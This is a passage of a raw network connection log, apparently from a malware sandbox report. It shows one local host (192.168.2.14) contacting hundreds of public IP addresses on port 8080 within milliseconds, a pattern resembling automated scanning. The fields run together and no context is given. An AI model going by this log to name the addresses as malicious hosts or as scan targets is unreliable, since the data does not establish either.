                                              Nov 23, 2023 05:14:52.046547890 CET478168080192.168.2.1495.48.134.77
                                              Nov 23, 2023 05:14:52.046547890 CET478168080192.168.2.1431.234.206.65
                                              Nov 23, 2023 05:14:52.046555042 CET478168080192.168.2.1485.204.90.160
                                              Nov 23, 2023 05:14:52.046555996 CET478168080192.168.2.1494.249.9.116
                                              Nov 23, 2023 05:14:52.046555996 CET478168080192.168.2.1485.165.128.134
                                              Nov 23, 2023 05:14:52.046555996 CET478168080192.168.2.1485.23.114.221
                                              Nov 23, 2023 05:14:52.046614885 CET478168080192.168.2.1494.203.64.203
                                              Nov 23, 2023 05:14:52.046614885 CET478168080192.168.2.1431.236.29.86
                                              Nov 23, 2023 05:14:52.046619892 CET478168080192.168.2.1495.6.91.118
                                              Nov 23, 2023 05:14:52.046619892 CET478168080192.168.2.1494.10.14.127
                                              Nov 23, 2023 05:14:52.046622992 CET478168080192.168.2.1462.200.189.65
                                              Nov 23, 2023 05:14:52.046622992 CET478168080192.168.2.1495.168.154.184
                                              Nov 23, 2023 05:14:52.046622992 CET478168080192.168.2.1495.225.117.240
                                              Nov 23, 2023 05:14:52.046622992 CET478168080192.168.2.1485.159.235.224
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1462.71.135.226
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1485.44.26.226
                                              Nov 23, 2023 05:14:52.046627045 CET478168080192.168.2.1495.193.80.105
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1431.43.70.172
                                              Nov 23, 2023 05:14:52.046627045 CET478168080192.168.2.1431.70.250.13
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1495.231.176.226
                                              Nov 23, 2023 05:14:52.046627045 CET478168080192.168.2.1485.97.178.41
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1485.238.204.34
                                              Nov 23, 2023 05:14:52.046627045 CET478168080192.168.2.1431.192.140.11
                                              Nov 23, 2023 05:14:52.046629906 CET478168080192.168.2.1431.59.224.224
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1485.4.147.32
                                              Nov 23, 2023 05:14:52.046629906 CET478168080192.168.2.1485.13.222.188
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1485.57.20.107
                                              Nov 23, 2023 05:14:52.046629906 CET478168080192.168.2.1462.175.198.43
                                              Nov 23, 2023 05:14:52.046626091 CET478168080192.168.2.1462.181.82.128
                                              Nov 23, 2023 05:14:52.046629906 CET478168080192.168.2.1495.207.124.48
                                              Nov 23, 2023 05:14:52.046629906 CET478168080192.168.2.1431.221.81.186
                                              Nov 23, 2023 05:14:52.046658993 CET478168080192.168.2.1495.124.58.233
                                              Nov 23, 2023 05:14:52.046658993 CET478168080192.168.2.1495.171.112.94
                                              Nov 23, 2023 05:14:52.046659946 CET478168080192.168.2.1495.115.103.117
                                              Nov 23, 2023 05:14:52.046659946 CET478168080192.168.2.1495.187.141.178
                                              Nov 23, 2023 05:14:52.046659946 CET478168080192.168.2.1462.211.96.229
                                              Nov 23, 2023 05:14:52.046659946 CET478168080192.168.2.1431.52.154.174
                                              Nov 23, 2023 05:14:52.046659946 CET478168080192.168.2.1431.233.34.37
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1495.46.97.147
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1495.3.237.211
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1431.93.4.112
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1494.240.152.151
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1485.52.67.11
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1494.4.30.73
                                              Nov 23, 2023 05:14:52.046662092 CET478168080192.168.2.1495.74.75.14
                                              Nov 23, 2023 05:14:52.046664000 CET478168080192.168.2.1485.240.58.47
                                              Nov 23, 2023 05:14:52.046664000 CET478168080192.168.2.1431.104.28.109
                                              Nov 23, 2023 05:14:52.046664000 CET478168080192.168.2.1494.118.122.60
                                              Nov 23, 2023 05:14:52.046665907 CET478168080192.168.2.1494.234.164.218
                                              Nov 23, 2023 05:14:52.046665907 CET478168080192.168.2.1494.192.13.100
                                              Nov 23, 2023 05:14:52.046665907 CET478168080192.168.2.1462.2.214.26
                                              Nov 23, 2023 05:14:52.046665907 CET478168080192.168.2.1494.198.175.157
                                              Nov 23, 2023 05:14:52.046665907 CET478168080192.168.2.1431.164.142.139
                                              Nov 23, 2023 05:14:52.046665907 CET478168080192.168.2.1494.243.15.148
                                              Nov 23, 2023 05:14:52.046667099 CET478168080192.168.2.1494.207.117.42
                                              Nov 23, 2023 05:14:52.046667099 CET478168080192.168.2.1495.232.101.249
                                              Nov 23, 2023 05:14:52.046668053 CET478168080192.168.2.1431.53.74.246
                                              Nov 23, 2023 05:14:52.046668053 CET478168080192.168.2.1462.181.83.79
                                              Nov 23, 2023 05:14:52.046668053 CET478168080192.168.2.1485.193.53.161
                                              Nov 23, 2023 05:14:52.046668053 CET478168080192.168.2.1462.208.144.237
                                              Nov 23, 2023 05:14:52.046668053 CET478168080192.168.2.1494.43.215.131
                                              Nov 23, 2023 05:14:52.046674967 CET478168080192.168.2.1495.105.72.33
                                              Nov 23, 2023 05:14:52.046674967 CET478168080192.168.2.1485.68.179.249
                                              Nov 23, 2023 05:14:52.046674967 CET478168080192.168.2.1462.228.149.157
                                              Nov 23, 2023 05:14:52.046694994 CET478168080192.168.2.1431.32.60.245
                                              Nov 23, 2023 05:14:52.046695948 CET478168080192.168.2.1495.107.134.209
                                              Nov 23, 2023 05:14:52.046695948 CET478168080192.168.2.1485.159.71.100
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1495.72.185.31
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1485.21.140.74
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1431.253.122.162
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1495.231.243.180
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1431.144.75.253
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1495.196.203.195
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1494.202.176.253
                                              Nov 23, 2023 05:14:52.046710014 CET478168080192.168.2.1431.138.222.238
                                              Nov 23, 2023 05:14:52.046721935 CET478168080192.168.2.1485.225.39.22
                                              Nov 23, 2023 05:14:52.046722889 CET478168080192.168.2.1485.155.14.236
                                              Nov 23, 2023 05:14:52.046722889 CET478168080192.168.2.1494.229.230.241
                                              Nov 23, 2023 05:14:52.046722889 CET478168080192.168.2.1494.44.142.131
                                              Nov 23, 2023 05:14:52.046722889 CET478168080192.168.2.1494.173.15.242
                                              Nov 23, 2023 05:14:52.046722889 CET478168080192.168.2.1485.96.142.229
                                              Nov 23, 2023 05:14:52.046725035 CET478168080192.168.2.1495.68.219.118
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1485.3.251.10
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1495.230.212.71
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1494.100.156.42
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1462.10.202.77
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1485.189.186.190
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1495.92.182.70
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1485.254.24.14
                                              Nov 23, 2023 05:14:52.046736956 CET478168080192.168.2.1495.140.116.42
                                              Nov 23, 2023 05:14:52.046741009 CET478168080192.168.2.1485.98.83.12
                                              Nov 23, 2023 05:14:52.046746969 CET478168080192.168.2.1462.213.204.228
                                              Nov 23, 2023 05:14:52.046746969 CET478168080192.168.2.1485.208.213.241
                                              Nov 23, 2023 05:14:52.046746969 CET478168080192.168.2.1495.228.4.234
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1495.85.221.240
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1431.39.196.80
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1431.234.218.66
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1495.12.89.19
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1462.156.174.241
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1485.122.216.212
                                              Nov 23, 2023 05:14:52.046753883 CET478168080192.168.2.1431.234.24.235
                                              Nov 23, 2023 05:14:52.046755075 CET478168080192.168.2.1495.4.179.241
                                              Nov 23, 2023 05:14:52.046761990 CET478168080192.168.2.1485.22.137.155
                                              Nov 23, 2023 05:14:52.046761990 CET478168080192.168.2.1485.230.47.254
                                              Nov 23, 2023 05:14:52.046761990 CET478168080192.168.2.1485.161.84.143
                                              Nov 23, 2023 05:14:52.046761990 CET478168080192.168.2.1431.3.128.185
                                              Nov 23, 2023 05:14:52.046761990 CET478168080192.168.2.1494.203.192.126
                                              Nov 23, 2023 05:14:52.046763897 CET478168080192.168.2.1485.184.108.193
                                              Nov 23, 2023 05:14:52.046763897 CET478168080192.168.2.1462.87.164.77
                                              Nov 23, 2023 05:14:52.046763897 CET478168080192.168.2.1431.113.142.24
                                              Nov 23, 2023 05:14:52.046763897 CET478168080192.168.2.1431.174.52.12
                                              Nov 23, 2023 05:14:52.046763897 CET478168080192.168.2.1431.118.206.192
                                              Nov 23, 2023 05:14:52.046765089 CET478168080192.168.2.1495.18.116.36
                                              Nov 23, 2023 05:14:52.046765089 CET478168080192.168.2.1485.182.45.19
                                              Nov 23, 2023 05:14:52.046765089 CET478168080192.168.2.1495.17.216.124
                                              Nov 23, 2023 05:14:52.046773911 CET478168080192.168.2.1495.182.112.254
                                              Nov 23, 2023 05:14:52.046822071 CET478168080192.168.2.1485.210.191.250
                                              Nov 23, 2023 05:14:52.046822071 CET478168080192.168.2.1485.5.221.103
                                              Nov 23, 2023 05:14:52.046834946 CET478168080192.168.2.1431.163.39.223
                                              Nov 23, 2023 05:14:52.046837091 CET478168080192.168.2.1494.149.167.156
                                              Nov 23, 2023 05:14:52.046845913 CET478168080192.168.2.1485.68.21.249
                                              Nov 23, 2023 05:14:52.046845913 CET478168080192.168.2.1495.211.133.13
                                              Nov 23, 2023 05:14:52.046847105 CET478168080192.168.2.1431.164.183.248
                                              Nov 23, 2023 05:14:52.046847105 CET478168080192.168.2.1494.199.64.38
                                              Nov 23, 2023 05:14:52.046847105 CET478168080192.168.2.1462.179.191.198
                                              Nov 23, 2023 05:14:52.046847105 CET478168080192.168.2.1494.82.252.131
                                              Nov 23, 2023 05:14:52.046849012 CET478168080192.168.2.1462.83.238.159
                                              Nov 23, 2023 05:14:52.046849966 CET478168080192.168.2.1485.7.193.34
                                              Nov 23, 2023 05:14:52.046849966 CET478168080192.168.2.1431.86.54.218
                                              Nov 23, 2023 05:14:52.046849966 CET478168080192.168.2.1462.178.117.178
                                              Nov 23, 2023 05:14:52.046849966 CET478168080192.168.2.1431.65.245.32
                                              Nov 23, 2023 05:14:52.046849966 CET478168080192.168.2.1495.214.245.17
                                              Nov 23, 2023 05:14:52.046852112 CET478168080192.168.2.1462.180.108.68
                                              Nov 23, 2023 05:14:52.046852112 CET478168080192.168.2.1495.116.140.168
                                              Nov 23, 2023 05:14:52.046852112 CET478168080192.168.2.1431.95.171.64
                                              Nov 23, 2023 05:14:52.046852112 CET478168080192.168.2.1431.216.26.53
                                              Nov 23, 2023 05:14:52.046852112 CET478168080192.168.2.1431.114.128.192
                                              Nov 23, 2023 05:14:52.046852112 CET478168080192.168.2.1494.241.148.155
                                              Nov 23, 2023 05:14:52.046859980 CET478168080192.168.2.1495.176.168.29
                                              Nov 23, 2023 05:14:52.046871901 CET478168080192.168.2.1462.240.111.127
                                              Nov 23, 2023 05:14:52.046878099 CET478168080192.168.2.1495.197.201.123
                                              Nov 23, 2023 05:14:52.046883106 CET478168080192.168.2.1495.196.25.130
                                              Nov 23, 2023 05:14:52.046883106 CET478168080192.168.2.1485.221.181.24
                                              Nov 23, 2023 05:14:52.046894073 CET478168080192.168.2.1462.243.242.233
                                              Nov 23, 2023 05:14:52.046905041 CET478168080192.168.2.1495.86.31.102
                                              Nov 23, 2023 05:14:52.046905994 CET478168080192.168.2.1485.3.66.180
                                              Nov 23, 2023 05:14:52.046916008 CET478168080192.168.2.1495.131.195.100
                                              Nov 23, 2023 05:14:52.046916962 CET478168080192.168.2.1431.165.57.29
                                              Nov 23, 2023 05:14:52.046922922 CET478168080192.168.2.1462.66.154.190
                                              Nov 23, 2023 05:14:52.046927929 CET478168080192.168.2.1494.19.187.0
                                              Nov 23, 2023 05:14:52.046931028 CET478168080192.168.2.1462.241.116.114
                                              Nov 23, 2023 05:14:52.046938896 CET478168080192.168.2.1485.153.73.39
                                              Nov 23, 2023 05:14:52.046947002 CET478168080192.168.2.1495.80.82.204
                                              Nov 23, 2023 05:14:52.046955109 CET478168080192.168.2.1495.240.23.227
                                              Nov 23, 2023 05:14:52.046958923 CET478168080192.168.2.1495.81.149.102
                                              Nov 23, 2023 05:14:52.046963930 CET478168080192.168.2.1485.221.72.66
                                              Nov 23, 2023 05:14:52.046976089 CET478168080192.168.2.1485.99.84.99
                                              Nov 23, 2023 05:14:52.046982050 CET478168080192.168.2.1431.194.121.75
                                              Nov 23, 2023 05:14:52.046989918 CET478168080192.168.2.1485.122.47.164
                                              Nov 23, 2023 05:14:52.046993017 CET478168080192.168.2.1494.170.35.56
                                              Nov 23, 2023 05:14:52.046993017 CET478168080192.168.2.1485.208.193.48
                                              Nov 23, 2023 05:14:52.047000885 CET478168080192.168.2.1462.162.103.54
                                              Nov 23, 2023 05:14:52.047002077 CET478168080192.168.2.1495.152.157.7
                                              Nov 23, 2023 05:14:52.047002077 CET478168080192.168.2.1485.97.144.46
                                              Nov 23, 2023 05:14:52.047009945 CET478168080192.168.2.1462.55.254.37
                                              Nov 23, 2023 05:14:52.047010899 CET478168080192.168.2.1431.194.167.232
                                              Nov 23, 2023 05:14:52.047020912 CET478168080192.168.2.1431.224.238.134
                                              Nov 23, 2023 05:14:52.047039032 CET478168080192.168.2.1495.164.192.57
                                              Nov 23, 2023 05:14:52.047039032 CET478168080192.168.2.1485.35.23.143
                                              Nov 23, 2023 05:14:52.047039032 CET478168080192.168.2.1494.111.210.40
                                              Nov 23, 2023 05:14:52.047044039 CET478168080192.168.2.1431.120.236.53
                                              Nov 23, 2023 05:14:52.047051907 CET478168080192.168.2.1485.205.153.194
                                              Nov 23, 2023 05:14:52.047058105 CET478168080192.168.2.1494.225.75.12
                                              Nov 23, 2023 05:14:52.047060966 CET478168080192.168.2.1485.188.153.193
                                              Nov 23, 2023 05:14:52.047063112 CET478168080192.168.2.1431.177.150.183
                                              Nov 23, 2023 05:14:52.047064066 CET478168080192.168.2.1485.58.125.112
                                              Nov 23, 2023 05:14:52.047065973 CET478168080192.168.2.1494.52.76.157
                                              Nov 23, 2023 05:14:52.047074080 CET478168080192.168.2.1495.122.198.230
                                              Nov 23, 2023 05:14:52.047080994 CET478168080192.168.2.1494.171.210.79
                                              Nov 23, 2023 05:14:52.047094107 CET478168080192.168.2.1494.15.214.155
                                              Nov 23, 2023 05:14:52.047096968 CET478168080192.168.2.1495.45.5.124
                                              Nov 23, 2023 05:14:52.047100067 CET478168080192.168.2.1462.81.174.128
                                              Nov 23, 2023 05:14:52.047102928 CET478168080192.168.2.1462.221.77.137
                                              Nov 23, 2023 05:14:52.047111034 CET478168080192.168.2.1462.54.173.184
                                              Nov 23, 2023 05:14:52.047115088 CET478168080192.168.2.1431.50.103.145
                                              Nov 23, 2023 05:14:52.047116995 CET478168080192.168.2.1462.65.30.66
                                              Nov 23, 2023 05:14:52.047131062 CET478168080192.168.2.1462.137.110.182
                                              Nov 23, 2023 05:14:52.047132015 CET478168080192.168.2.1462.81.167.22
                                              Nov 23, 2023 05:14:52.047133923 CET478168080192.168.2.1495.209.240.197
                                              Nov 23, 2023 05:14:52.047144890 CET478168080192.168.2.1495.84.40.71
                                              Nov 23, 2023 05:14:52.047147036 CET478168080192.168.2.1431.129.176.146
                                              Nov 23, 2023 05:14:52.047153950 CET478168080192.168.2.1494.56.6.103
                                              Nov 23, 2023 05:14:52.047163963 CET478168080192.168.2.1485.9.125.14
                                              Nov 23, 2023 05:14:52.047173977 CET478168080192.168.2.1431.107.205.170
                                              Nov 23, 2023 05:14:52.047174931 CET478168080192.168.2.1495.110.179.225
                                              Nov 23, 2023 05:14:52.047175884 CET478168080192.168.2.1462.244.146.36
                                              Nov 23, 2023 05:14:52.047177076 CET478168080192.168.2.1462.107.15.84
                                              Nov 23, 2023 05:14:52.047187090 CET478168080192.168.2.1495.202.97.117
                                              Nov 23, 2023 05:14:52.047192097 CET478168080192.168.2.1485.54.26.149
                                              Nov 23, 2023 05:14:52.047199011 CET478168080192.168.2.1485.134.239.211
                                              Nov 23, 2023 05:14:52.047221899 CET478168080192.168.2.1485.206.229.111
                                              Nov 23, 2023 05:14:52.047221899 CET478168080192.168.2.1485.241.245.78
                                              Nov 23, 2023 05:14:52.047228098 CET478168080192.168.2.1495.232.161.108
                                              Nov 23, 2023 05:14:52.047230005 CET478168080192.168.2.1495.221.188.206
                                              Nov 23, 2023 05:14:52.047230005 CET478168080192.168.2.1495.151.211.75
                                              Nov 23, 2023 05:14:52.047231913 CET478168080192.168.2.1462.45.212.207
                                              Nov 23, 2023 05:14:52.047231913 CET478168080192.168.2.1495.21.167.28
                                              Nov 23, 2023 05:14:52.047236919 CET478168080192.168.2.1462.81.38.198
                                              Nov 23, 2023 05:14:52.047238111 CET478168080192.168.2.1462.100.11.195
                                              Nov 23, 2023 05:14:52.047245979 CET478168080192.168.2.1495.184.184.140
                                              Nov 23, 2023 05:14:52.047250986 CET478168080192.168.2.1495.59.51.207
                                              Nov 23, 2023 05:14:52.047260046 CET478168080192.168.2.1431.69.23.69
                                              Nov 23, 2023 05:14:52.047274113 CET478168080192.168.2.1462.220.8.54
                                              Nov 23, 2023 05:14:52.047276020 CET478168080192.168.2.1495.94.114.245
                                              Nov 23, 2023 05:14:52.047281027 CET478168080192.168.2.1462.54.170.73
                                              Nov 23, 2023 05:14:52.047287941 CET478168080192.168.2.1495.203.235.62
                                              Nov 23, 2023 05:14:52.047295094 CET478168080192.168.2.1495.156.209.160
                                              Nov 23, 2023 05:14:52.047295094 CET478168080192.168.2.1495.127.190.144
                                              Nov 23, 2023 05:14:52.047297001 CET478168080192.168.2.1494.107.180.93
                                              Nov 23, 2023 05:14:52.047307968 CET478168080192.168.2.1494.41.34.232
                                              Nov 23, 2023 05:14:52.047308922 CET478168080192.168.2.1431.165.145.205
                                              Nov 23, 2023 05:14:52.047312021 CET478168080192.168.2.1462.213.149.81
                                              Nov 23, 2023 05:14:52.047312021 CET478168080192.168.2.1495.198.241.12
                                              Nov 23, 2023 05:14:52.047328949 CET478168080192.168.2.1462.63.167.136
                                              Nov 23, 2023 05:14:52.047328949 CET478168080192.168.2.1494.39.4.162
                                              Nov 23, 2023 05:14:52.047344923 CET478168080192.168.2.1462.77.150.166
                                              Nov 23, 2023 05:14:52.047344923 CET478168080192.168.2.1485.205.3.174
                                              Nov 23, 2023 05:14:52.047348976 CET478168080192.168.2.1494.94.235.39
                                              Nov 23, 2023 05:14:52.047354937 CET478168080192.168.2.1495.116.54.51
                                              Nov 23, 2023 05:14:52.047358036 CET478168080192.168.2.1494.30.169.241
                                              Nov 23, 2023 05:14:52.047368050 CET478168080192.168.2.1494.10.220.144
                                              Nov 23, 2023 05:14:52.047370911 CET478168080192.168.2.1485.10.243.156
                                              Nov 23, 2023 05:14:52.047374964 CET478168080192.168.2.1485.198.152.161
                                              Nov 23, 2023 05:14:52.047377110 CET478168080192.168.2.1485.143.252.69
                                              Nov 23, 2023 05:14:52.047386885 CET478168080192.168.2.1495.214.209.9
                                              Nov 23, 2023 05:14:52.047389030 CET478168080192.168.2.1431.174.69.31
                                              Nov 23, 2023 05:14:52.047391891 CET478168080192.168.2.1431.100.60.126
                                              Nov 23, 2023 05:14:52.047405958 CET478168080192.168.2.1462.163.57.19
                                              Nov 23, 2023 05:14:52.047405958 CET478168080192.168.2.1494.222.139.184
                                              Nov 23, 2023 05:14:52.047418118 CET478168080192.168.2.1462.73.87.239
                                              Nov 23, 2023 05:14:52.047419071 CET478168080192.168.2.1485.39.247.97
                                              Nov 23, 2023 05:14:52.047430992 CET478168080192.168.2.1495.224.163.244
                                              Nov 23, 2023 05:14:52.047441006 CET478168080192.168.2.1494.9.236.193
                                              Nov 23, 2023 05:14:52.047446966 CET478168080192.168.2.1431.122.52.205
                                              Nov 23, 2023 05:14:52.047447920 CET478168080192.168.2.1495.220.76.57
                                              Nov 23, 2023 05:14:52.047452927 CET478168080192.168.2.1495.27.33.180
                                              Nov 23, 2023 05:14:52.047456026 CET478168080192.168.2.1462.225.173.38
                                              Nov 23, 2023 05:14:52.047466040 CET478168080192.168.2.1494.47.130.15
                                              Nov 23, 2023 05:14:52.047470093 CET478168080192.168.2.1494.217.138.231
                                              Nov 23, 2023 05:14:52.047471046 CET478168080192.168.2.1495.10.197.87
                                              Nov 23, 2023 05:14:52.047482014 CET478168080192.168.2.1495.79.139.118
                                              Nov 23, 2023 05:14:52.047488928 CET478168080192.168.2.1494.52.47.119
                                              Nov 23, 2023 05:14:52.047489882 CET478168080192.168.2.1431.2.217.173
                                              Nov 23, 2023 05:14:52.047497988 CET478168080192.168.2.1485.180.203.97
                                              Nov 23, 2023 05:14:52.047508001 CET478168080192.168.2.1462.159.120.222
                                              Nov 23, 2023 05:14:52.047518015 CET478168080192.168.2.1495.193.223.235
                                              Nov 23, 2023 05:14:52.047521114 CET478168080192.168.2.1485.171.198.110
                                              Nov 23, 2023 05:14:52.047528028 CET478168080192.168.2.1485.167.59.79
                                              Nov 23, 2023 05:14:52.047528982 CET478168080192.168.2.1431.41.193.142
                                              Nov 23, 2023 05:14:52.047533989 CET478168080192.168.2.1485.63.169.143
                                              Nov 23, 2023 05:14:52.047555923 CET478168080192.168.2.1485.112.126.41
                                              Nov 23, 2023 05:14:52.047557116 CET478168080192.168.2.1462.152.74.47
                                              Nov 23, 2023 05:14:52.047558069 CET478168080192.168.2.1485.211.65.255
                                              Nov 23, 2023 05:14:52.047564983 CET478168080192.168.2.1495.9.108.170
                                              Nov 23, 2023 05:14:52.047564983 CET478168080192.168.2.1494.71.192.250
                                              Nov 23, 2023 05:14:52.047564983 CET478168080192.168.2.1485.12.52.199
                                              Nov 23, 2023 05:14:52.047566891 CET478168080192.168.2.1494.255.57.183
                                              Nov 23, 2023 05:14:52.047566891 CET478168080192.168.2.1495.225.243.78
                                              Nov 23, 2023 05:14:52.047585011 CET478168080192.168.2.1495.20.253.27
                                              Nov 23, 2023 05:14:52.047585964 CET478168080192.168.2.1431.24.35.243
                                              Nov 23, 2023 05:14:52.047590017 CET478168080192.168.2.1462.212.227.150
                                              Nov 23, 2023 05:14:52.047595978 CET478168080192.168.2.1462.97.255.61
                                              Nov 23, 2023 05:14:52.047607899 CET478168080192.168.2.1485.13.254.136
                                              Nov 23, 2023 05:14:52.047616005 CET478168080192.168.2.1462.163.23.39
                                              Nov 23, 2023 05:14:52.047616959 CET478168080192.168.2.1495.203.246.252
                                              Nov 23, 2023 05:14:52.047617912 CET478168080192.168.2.1462.197.71.209
                                              Nov 23, 2023 05:14:52.047620058 CET478168080192.168.2.1485.31.197.222
                                              Nov 23, 2023 05:14:52.047630072 CET478168080192.168.2.1462.210.27.205
                                              Nov 23, 2023 05:14:52.047633886 CET478168080192.168.2.1495.144.62.196
                                              Nov 23, 2023 05:14:52.047638893 CET478168080192.168.2.1485.145.67.203
                                              Nov 23, 2023 05:14:52.047651052 CET478168080192.168.2.1485.166.233.88
                                              Nov 23, 2023 05:14:52.047657967 CET478168080192.168.2.1495.18.54.185
                                              Nov 23, 2023 05:14:52.047671080 CET478168080192.168.2.1431.40.54.250
                                              Nov 23, 2023 05:14:52.047672033 CET478168080192.168.2.1462.85.101.228
                                              Nov 23, 2023 05:14:52.047677040 CET478168080192.168.2.1485.22.192.156
                                              Nov 23, 2023 05:14:52.047689915 CET478168080192.168.2.1494.36.73.49
                                              Nov 23, 2023 05:14:52.047694921 CET478168080192.168.2.1495.168.196.139
                                              Nov 23, 2023 05:14:52.047698021 CET478168080192.168.2.1495.76.200.235
                                              Nov 23, 2023 05:14:52.047698021 CET478168080192.168.2.1431.174.202.112
                                              Nov 23, 2023 05:14:52.047708988 CET478168080192.168.2.1462.196.45.252
                                              Nov 23, 2023 05:14:52.047709942 CET478168080192.168.2.1494.0.239.20
                                              Nov 23, 2023 05:14:52.047713995 CET478168080192.168.2.1485.126.94.114
                                              Nov 23, 2023 05:14:52.047718048 CET478168080192.168.2.1431.16.251.84
                                              Nov 23, 2023 05:14:52.047733068 CET478168080192.168.2.1431.148.149.77
                                              Nov 23, 2023 05:14:52.047733068 CET478168080192.168.2.1495.0.65.17
                                              Nov 23, 2023 05:14:52.047735929 CET478168080192.168.2.1495.177.249.8
                                              Nov 23, 2023 05:14:52.047758102 CET478168080192.168.2.1431.9.218.164
                                              Nov 23, 2023 05:14:52.047765970 CET478168080192.168.2.1495.162.106.202
                                              Nov 23, 2023 05:14:52.047766924 CET478168080192.168.2.1495.183.122.114
                                              Nov 23, 2023 05:14:52.047766924 CET478168080192.168.2.1462.85.12.233
                                              Nov 23, 2023 05:14:52.047780991 CET478168080192.168.2.1462.138.195.32
                                              Nov 23, 2023 05:14:52.047780991 CET478168080192.168.2.1485.22.63.143
                                              Nov 23, 2023 05:14:52.047785044 CET478168080192.168.2.1485.49.136.1
                                              Nov 23, 2023 05:14:52.047796011 CET478168080192.168.2.1431.129.133.95
                                              Nov 23, 2023 05:14:52.047806025 CET478168080192.168.2.1431.196.146.192
                                              Nov 23, 2023 05:14:52.047806025 CET478168080192.168.2.1431.150.25.160
                                              Nov 23, 2023 05:14:52.047806025 CET478168080192.168.2.1494.169.200.73
                                              Nov 23, 2023 05:14:52.047821045 CET478168080192.168.2.1485.229.74.169
                                              Nov 23, 2023 05:14:52.047826052 CET478168080192.168.2.1494.146.161.221
                                              Nov 23, 2023 05:14:52.047827959 CET478168080192.168.2.1495.244.175.137
                                              Nov 23, 2023 05:14:52.047841072 CET478168080192.168.2.1494.11.42.107
                                              Nov 23, 2023 05:14:52.047852039 CET478168080192.168.2.1495.253.178.251
                                              Nov 23, 2023 05:14:52.047854900 CET478168080192.168.2.1485.245.152.92
                                              Nov 23, 2023 05:14:52.047859907 CET478168080192.168.2.1494.222.11.141
                                              Nov 23, 2023 05:14:52.047882080 CET478168080192.168.2.1494.72.130.142
                                              Nov 23, 2023 05:14:52.047878027 CET478168080192.168.2.1431.240.74.144
                                              Nov 23, 2023 05:14:52.047889948 CET478168080192.168.2.1485.59.68.158
                                              Nov 23, 2023 05:14:52.047892094 CET478168080192.168.2.1494.94.213.211
                                              Nov 23, 2023 05:14:52.047899008 CET478168080192.168.2.1485.164.90.120
                                              Nov 23, 2023 05:14:52.047907114 CET478168080192.168.2.1485.20.168.55
                                              Nov 23, 2023 05:14:52.047907114 CET478168080192.168.2.1494.19.98.141
                                              Nov 23, 2023 05:14:52.047911882 CET478168080192.168.2.1494.56.45.211
                                              Nov 23, 2023 05:14:52.047919035 CET478168080192.168.2.1494.156.179.236
                                              Nov 23, 2023 05:14:52.047930002 CET478168080192.168.2.1494.203.220.141
                                              Nov 23, 2023 05:14:52.047930956 CET478168080192.168.2.1431.17.167.220
                                              Nov 23, 2023 05:14:52.047940969 CET478168080192.168.2.1495.57.223.200
                                              Nov 23, 2023 05:14:52.047947884 CET478168080192.168.2.1485.225.67.248
                                              Nov 23, 2023 05:14:52.047952890 CET478168080192.168.2.1494.29.232.255
                                              Nov 23, 2023 05:14:52.047955990 CET478168080192.168.2.1462.128.214.62
                                              Nov 23, 2023 05:14:52.047960043 CET478168080192.168.2.1495.201.197.103
                                              Nov 23, 2023 05:14:52.047970057 CET478168080192.168.2.1495.72.102.203
                                              Nov 23, 2023 05:14:52.047971010 CET478168080192.168.2.1431.224.144.158
                                              Nov 23, 2023 05:14:52.047971964 CET478168080192.168.2.1431.191.132.183
                                              Nov 23, 2023 05:14:52.047981977 CET478168080192.168.2.1462.114.190.210
                                              Nov 23, 2023 05:14:52.047991037 CET478168080192.168.2.1431.32.138.187
                                              Nov 23, 2023 05:14:52.047991037 CET478168080192.168.2.1462.230.240.24
                                              Nov 23, 2023 05:14:52.048000097 CET478168080192.168.2.1485.107.14.244
                                              Nov 23, 2023 05:14:52.048002958 CET478168080192.168.2.1485.130.128.184
                                              Nov 23, 2023 05:14:52.048012972 CET478168080192.168.2.1485.137.67.170
                                              Nov 23, 2023 05:14:52.048028946 CET478168080192.168.2.1462.175.193.234
                                              Nov 23, 2023 05:14:52.048028946 CET478168080192.168.2.1485.215.191.31
                                              Nov 23, 2023 05:14:52.048042059 CET478168080192.168.2.1494.212.11.46
                                              Nov 23, 2023 05:14:52.048042059 CET478168080192.168.2.1462.140.235.24
                                              Nov 23, 2023 05:14:52.048053026 CET478168080192.168.2.1462.71.41.227
                                              Nov 23, 2023 05:14:52.048059940 CET478168080192.168.2.1494.200.143.4
                                              Nov 23, 2023 05:14:52.048059940 CET478168080192.168.2.1494.132.102.30
                                              Nov 23, 2023 05:14:52.048062086 CET478168080192.168.2.1462.13.123.183
                                              Nov 23, 2023 05:14:52.048065901 CET478168080192.168.2.1431.134.104.172
